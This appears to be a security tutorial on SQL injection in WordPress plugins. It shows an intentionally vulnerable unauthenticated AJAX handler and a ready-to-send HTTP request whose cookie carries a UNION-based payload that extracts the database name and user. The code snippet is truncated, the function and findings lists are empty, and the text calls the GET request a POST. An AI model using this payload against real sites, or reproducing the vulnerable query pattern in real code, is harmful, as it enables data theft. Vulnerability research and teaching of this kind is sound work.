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SQL Injection (SQLi)


This article covers cases of possible SQLi on WordPress. This includes improper usage of functions and user input handling inside of the plugin/theme which can be used to inject a malicious query into the SQL execution to leak sensitive data.

Useful Functions

Several functions could be useful to identify a possible SQLi vulnerability:

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_nopriv_load_questions", "load_questions");
function load_questions(){
global $wpdb;
$quiz_id = $_GET["quiz_id"];
if ( isset($_COOKIE[ 'question_ids_'.$quiz_id ]) ) {
$question_sql = sanitize_text_field( wp_unslash( $_COOKIE[ 'question_ids_'.$quiz_id ] ) );
}else {
$question_ids = array("1","2","3");
$question_sql = implode( ',', $question_ids );
$order_by_sql = 'ORDER BY FIELD(question_id,'.$question_sql.')';
$query = $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}custom_questions WHERE question_id IN (%1s)", $question_sql);
$questions = $wpdb->get_results( stripslashes( $query ) );

The vulnerable variable, in this case, is the $question_sql variable where the value is passed from $_COOKIE[ 'question_ids_'.$quiz_id ] value without proper sanitization or escaping. The sanitize_text_field function is not enough to prevent SQL Injection since the $question_sql variable is constructed inside an ORDER BY clause without proper escaping.

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the needed action and parameter to trigger the SQL Injection (let’s say that the {$wpdb->prefix}custom_questions table has 5 columns):

GET /wp-admin/admin-ajax.php?action=load_questions&quiz_id=1 HTTP/1.1
Host: localhost
Cookie: question_ids_1=1%29%20and%20false%20union%20select%20database%28%29%2C%271337%27%2C%271337%27%2Cuser%28%29%2C%271337%27%20--%20-%20
Connection: close

Below are some of the findings related to SQLi:

